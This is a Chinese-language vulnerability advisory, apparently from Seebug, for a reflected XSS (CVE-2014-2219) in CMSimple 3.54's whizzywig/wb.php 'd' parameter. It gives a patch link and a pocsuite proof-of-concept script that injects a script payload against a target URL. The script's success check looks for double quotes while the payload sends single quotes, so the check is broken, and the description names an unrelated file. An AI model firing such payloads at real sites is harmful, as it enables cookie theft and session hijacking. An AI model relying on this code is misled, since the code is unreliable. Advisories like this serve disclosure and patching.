Bugtraq ID:66312
CVE ID:CVE-2014-2219
CMSimple是一个国外开源的简易内容管理系统。
CMSimple不正确过滤传递给"/whizzywig/wb.php"脚本的"d" HTTP GET参数数据,允许攻击者构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。
0
CMSimple 3.54
用户可参考如下厂商提供的安全补丁以修复该漏洞:
http://sourceforge.net/projects/cmsimple-le/files/cmsimple_classic/
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = 'SSV-61903' # vul ID
version = '1'
author = 'fenghh'
vulDate = '2014-03-25'
createDate = '2015-10-14'
updateDate = '2015-10-14'
references = ['http://sebug.net/vuldb/ssvid-61903']
name = 'CMSimple 3.54 /whizzywig/wb.php XSS漏洞'
appPowerLink = 'www.cmsimple.dk'
appName = 'cmsimple'
appVersion = '3.54'
vulType = 'XSS'
desc = '''
漏洞文件:Getarticle.CMSimple不正确过滤传递给"/whizzywig/wb.php"脚本的"d" HTTP GET参数数据,
允许攻击者构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。
'''
# the sample sites for examine
samples = ['']
def _verify(self):
output = Output(self)
result = {}
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27sebug%27%29%3C/script%3E'
verify_url = self.url + payload
content = req.get(verify_url).content
if '<script>alert("sebug")</script>' in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
output.success(result)
else:
output.fail('XSS Failed')
return output
def _attack(self):
return self._verify()
register(TestPOC)